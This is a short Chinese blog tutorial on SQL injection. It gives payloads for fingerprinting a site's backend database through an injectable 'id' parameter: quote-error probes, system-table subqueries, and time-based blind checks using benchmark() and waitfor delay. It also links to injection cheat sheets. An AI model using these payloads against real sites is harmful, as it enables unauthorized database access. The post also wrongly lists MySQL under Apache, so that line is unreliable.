SQL注入攻击技巧总结

0×01 你要知道目前有哪些数据库

微软公司旗下的:

Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER (大型数据库操作,功能和性能异常强大)(一般也是ASP或者ASP.NET)

access,微软Office系列产品之一,极小型数据库。功能和性能当然也是相当一般。性能甚至可以说是相当低(常与ASP应用交互)

Oracle公司旗下的:

MySQL 是一个关系型数据库管理系统(常与PHP web应用交互)

Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统

Apache旗下的:

MySql

0×02 判断你的web应用是什么类型的数据库

(在可注入的情况下,判断数据库类型)(我以数字型注入为例子)

单引号判断:

id=1′页面出现类似错误显示 “Microsoft JET Database Engine 错误 ’80040e14′” JET 为ACCESS数据库
id=1′页面出现类似错误显示 “Microsoft OLE DB Provider for sql server错误 ‘xxxxxx’ ” 就为MSSQL数据库

条件判断:
id=1 and user>0 出错爆出user用户名的是 MSSQL

如果不爆错,那么我们用以下方式

id=1 and (select count(*) from sysobjects)>0 访回与id=1时页面一样 就为MSSQL数据库

id=1 and (select count(*) from msysobjects)>0 access会返回你没有权限查看

如果也没反应怎么办?

那我们就盲注吧

mysql 盲注语句为 id=1 and if(1=1,benchmark(100,md5(1)),0) //如果可延时执行,为Mysql数据库
mssql 盲注语句为 id=1 and if(1=1) waitfor delay ’00:00:04′;

0×03 针对数据库类型,进行相应的SQL注入攻击

看了下面的文章,你可能知道为什么要分析是web应用是什么数据库啦!

如果你分析为 MYSQL 注入,我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#MySQL_Default_Databases

如果你分析为 MSSQL 注入,我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#MSSQL_Default_Databases

如果你分析为 ORACLE 注入,我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#Oracle_Default_Databases

上一篇:0527 Sprint 1 总结


下一篇:Raiden Charge